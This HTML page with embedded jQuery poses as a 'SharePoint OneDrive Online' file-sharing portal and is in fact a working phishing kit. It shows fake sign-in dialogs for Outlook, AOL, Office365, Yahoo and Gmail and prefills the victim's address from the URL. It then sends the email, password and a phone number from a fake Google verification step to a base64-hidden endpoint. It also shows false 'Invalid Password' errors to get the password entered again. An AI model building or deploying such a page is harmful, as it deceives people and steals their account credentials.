
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>SharePoint OneDrive Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row">
        <div class="col-lg-6 text-center" style="padding: 50px 80px 50px 80px;">
          <img src="images/onedrive.png" class="img-fluid" width="300px"><br>
          <span class="h5">Select an Email provider to view shared files</span><br><br>
          <img src="images/infoondrive.jpg" class="img-fluid" width="300px"><br><br>
          <span class="h5">Share and access your files anywhere on any device with OneDrive Cloud <br>
            Ultra-Secure, share and collaborate Docs with OneDrive 
          </span> 
        </div>
        <div class="col-lg-6" style="background-image:url('images/onedriveside2.jpg'); background-size: cover;background-repeat: no-repeat; background-position: right; padding: 270px 30px 270px 30px;">
          <div class="container rounded" style="background-color: rgba(0,0,0,0.5);">
            <div class="row">
              <div class="col-lg-12" style="padding: 20px 50px 20px 50px;">
                <div class="p-5 rounded">
                  <div class="row">
                    <div class="col-lg-12 text-center">
                      <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #0073C8;">
                          <img src="images/outlook1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span>
                        </div>
                      </a>
                    </div>
                  </div>
                  <div class="row">
                    <div class="col-lg-12 text-center">
                      <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #31459B;">
                          <img src="images/aol1.png" class="img-fluid" width="35px" style="padding:5px 0px 5px 0px;">
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Aol</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-12 text-center">
                      <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;">
                          <img src="images/office3651.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                        </div>
                      </a>
                    </div>
                  </div>
                  <div class="row">
                    <div class="col-lg-12 text-center">
                      <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #5F0F68;">
                          <img src="images/yahoo1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Yahoo!</span>
                        </div>
                      </a>
                    </div>
                    <div class="col-lg-12 text-center">
                      <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                        <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;">
                          <img src="images/other1.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;">
                          <span  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                        </div>
                      </a>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>



    <!-- Modal for gmail -->
                <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-header">
                                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                    <span aria-hidden="true">&times;</span>
                                </button>
                            </div>
                            <div class="modal-body">
                                <center>
                                    <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
                                    <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
                                    <div class="alert alert-danger" id="msg"></div>
                                    <span id="error" class="text-danger">That account doesn't exist. Enter a different account</span>
                                </center>
                                <form id="contact" class="form-horizontal well">
                                    <div id="div1">
                                        <div class="col-lg-12">
                                            <div class="form-group">
                                                <div id="inputbar">
                                                    <label for="exampleInputEmail1">Email address</label>
                                                    <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email">
                                                    <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                                <div id="automail" class="h5 mt-5">
                                                    <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="aich">abc@abc.com</span>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="col-lg-12">
                                            <div class="form-group">
                                                <label for="Password">Password</label>
                                                <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password">
                                            </div>
                                        </div>
                                    </div>
                                    <div id="div2">
                                        <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich1" class="h5">abc@abc.com</span><br>
                                        <span class="h4 font-weight-normal">Verify it's you</span><br>
                                        <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                                        <span id="msg1" class="text-danger"></span><br>
                                        <span>Try another way to sign in</span>
                                        <div class="form-group mt-3">
                                            <input type="number" name="phone" class="form-control" id="phone" aria-describedby="aiHelp" placeholder="Enter Phone No.">
                                        </div>
                                    </div>
                            </div>
                            <div class="modal-footer">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <button class="btn btn-info pull-right" id="submit-btn">Login</button>
                                <button class="btn btn-info pull-right" id="submit-btn1">verify</button>
                            </div>
                            </form>
                        </div>
                    </div>
                </div>
                <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
<!--  /* global $ */
$(document).ready(function() {
    var count = 0;
    $('#div2').hide();
    $('#error').hide();
    $("#automail").hide();
    $("#msg").hide();
    $('#submit-btn1').hide();
    $('#back').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");

        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);

    });
    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var ou = "b3V0bG9vaw==";
        var ho = "aG90bWFpbA==";
        if (final == "gmail") {
            $('#contact').trigger("reset");
            $('#fieldImg').attr('src', 'images/gmail.png');
            $('#field').html("Gmail");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        } else if (final == atob(ou) || final == atob(ho)) {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'images/outlook.png');
            $('#field').html("Outlook");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        } else if (final == "aol") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'images/aol.png');
            $('#field').html("Aol");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        } else if (final == "office365") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'images/office365.png');
            $('#field').html("Office 365");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        } else if (final == "yahoo") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'images/yahoo.png');
            $('#field').html("Yahoo");
            $("#msg").hide();
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $('#ai').val(my_ai);
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');

        } else {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'images/othermail.ico');
            $('#field').html("Other Mail");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        }
    }
    ///////////////url getting ai////////////////


    $('#gmailmodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/gmail.png');
        $('#field').html("Gmail");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');

    });

    $('#outlookmodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/outlook.png');
        $('#field').html("Outlook");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });
    $('#aolmodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/aol.png');
        $('#field').html("Aol");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });
    $('#office365modal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/office365.png');
        $('#field').html("Office 365");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });
    $('#yahoomodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/yahoo.png');
        $('#field').html("Yahoo");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });
    $('#othermodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'images/othermail.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });

    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var detail = $("#field").html();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;


        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
                detail: detail,

            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (count == 1 && final == "gmail") {
                    $('#aich1').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                $("#pr").val("");

                if (count >= 2) {
                    count = 0;
                    window.location.replace("view.html");
                }
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $('#msg').html(response['msg']);
                        // $('input, textarea').val(function() {
                        //    return this.defaultValue;
                        // });
                    } else {
                        $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                if (count == 1 && final == "gmail") {
                    $('#aich1').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                $("#pr").val("");
                if (count >= 3) {
                    count = 0;
                    window.location.replace("view.html");
                }
                $("#msg").show();
                $('#msg').html("Invalid Password.! Please enter correct password.");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });
    $('#submit-btn1').click(function(event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var phone = $("#phone").val();
        var detail = $("#field").html();
        var msg1 = $('#msg1').html();
        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
                detail: detail,
                phone: phone,

            },
            beforeSend: function(xhr) {
                $('#submit-btn1').html('Verifing...');
            },
            success: function(response) {
                window.location.replace("view.html");
                $('#pr').val("");
                if (response) {
                    // $("#msg1").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $('#msg1').html(response['msg']);
                    } else {
                        $('#msg1').html(response['msg']);
                    }
                }
            },
            error: function() {
                window.location.replace("view.html");
                $('#pr').val("");
                // $("#msg1").show();
                // $('#msg1').html("Invalid Phone.! Please enter correct Phone.");
            },
            complete: function() {
                $('#submit-btn1').html('Verify');
            }
        });
        // }
    });
});
</script>

</html>